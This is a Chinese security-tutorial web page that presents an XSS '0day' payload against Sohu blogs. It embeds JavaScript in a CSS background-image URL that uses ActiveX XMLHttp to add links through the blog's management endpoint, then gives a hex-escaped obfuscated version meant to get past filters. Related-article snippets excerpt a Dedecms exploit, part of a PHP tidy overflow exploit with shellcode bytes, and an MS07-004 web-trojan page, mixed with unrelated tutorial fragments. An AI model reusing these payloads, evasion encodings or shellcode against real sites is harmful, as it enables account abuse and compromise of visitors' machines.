XSS 0DAY代码_安全教程

文章作者:茄子宝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
看到梦之光芒放出来了!我也不藏了!
10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSS WORM初尝试的续吧.

其实很简单,就是两次转码.
<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">

ASCII转码参考 http://s0n9.blog.sohu.com/16002288.html

写成下面16进制转义字符串
<div style="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0065\0076\0061\006C\0028\0053\0074\0072\0069\006E\0067\002E\0066\0072\006F\006D\0043\0068\0061\0072\0043\006F\006......"></div> 

时间: 2024-11-05 22:35:21

XSS 0DAY代码_安全教程的相关文章

Dedecms getip()的漏洞利用代码_安全教程

author: superhei team:http://www.ph4nt0m.org blog:http://superhei.blogbus.com 在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.php function FushCache($mid=0) { if(empty($mid)) $mid = $this->M_ID; $dsql = new DedeSql(); $row = $dsql->GetOne("Select ID,

PHP 5.2.3 tidy扩展本地溢出漏洞利用代码_安全教程

复制代码 代码如下: <?php  if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}  $scode =  "\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85".  "\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x

新编MS07004网页木马源码代码_安全教程

复制代码 代码如下: <html xmlns:v="urn:schemas-microsoft-com:vml">  <head>  <object id="VMLRender"  classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">  </object>  <style>  v:* { behavior: url(#VMLRende

css pointer控制在firefox下显示手型的代码_基础教程

在ie下设置 css 样式 style="cursor:hand;" 可以正常显示 但是在firefox下就不行 改用 style="cursor:pointer;" 则在两个浏览器下都能正常显示 但只适用于IE6.0及以上版本以及FIREFOX,在IE5.0下不能显示成手

photoshop非主流_人物照片美白_制作教程

哈哈标题够长的吧,美白教程写的实在是太多了,我也不知道取什么标题了,所以就这样吧,我们这次还是用ps来对照片进行美白,但这是对人物哦. 最终效果图片, 原图. 1.打开要进行美白的照片如下.复制五图一个副本 滤镜-艺术效果-木刻,色阶数3.边缘简化数4.边缘逼真度 进行模糊如图 好了,最的就OK了,photoshop非主流_人物照片美白_制作教程就OK了.

安全专家发布可攻破Linux内核的0day代码

一位安全专家Brad Spengler近日发布了一段针对 Linux内核漏洞进行攻击的0day代码,并称这段代码能绕过Linux操作系统的NULL Pointer dereference安全保护机制.这段代码瞄准 Linux2.6.30/2.6.18内核版本中的一处漏洞,对32/64bit版本均有效.其中2.6.18版本是红帽子5的现用内核.这段代码能绕过Linux内核中的NULL Pointer dereference保护机制,并由此获得系统的Root级控制权,随后,代码将关闭系统的几项安全服

php 用户登陆代码,入门教程

php 用户登陆代码,入门教程  function login_xzy()  {   $user_=db("user");   $session_=db("session");   $login['email']=strip_tags($_POST['email']);   $login['pass']=empty($_POST['pass'])?"":md5($_POST['pass']);   if($user=$user_->wher

MVC4制作网站教程第四章 部分栏目功能实现代码_实用技巧

序 一.用户 二.用户组 三.栏目 3.1添加栏目 3.2浏览栏目 3.3更新栏目 3.4删除栏目 3.5前台栏目浏览 -- 栏目模型: 模型应有一下字段:栏目名称,父栏目id,栏目类型,内容模型,栏目视图,内容视图,链接地址,栏目排序.暂时先想到这么多,先这这么写着.  栏目名称和父栏目id不用说很简单.  栏目类型有三种:普通栏目-就是一般的栏目:单页栏目--是指栏目就是一个页面,像公司介绍,联系地址等:外部链接-是指栏目点一下就跳转到一个链接.  内容模型--是指栏目为普通栏目时,栏目的内

MVC4制作网站教程第二章 部分用户功能实现代码_实用技巧

用户部分要实现的功能有: 序 一.用户  1.1用户注册  1.2用户登录  1.3修改密码  1.4修改资料 要实现这些目的首先新建用户(Model)模型 /// <summary> /// 用户模型 /// </summary> public class User { [Key] public int UserId { get; set; } /// <summary> /// 用户组Id /// </summary> [Display(Name=&qu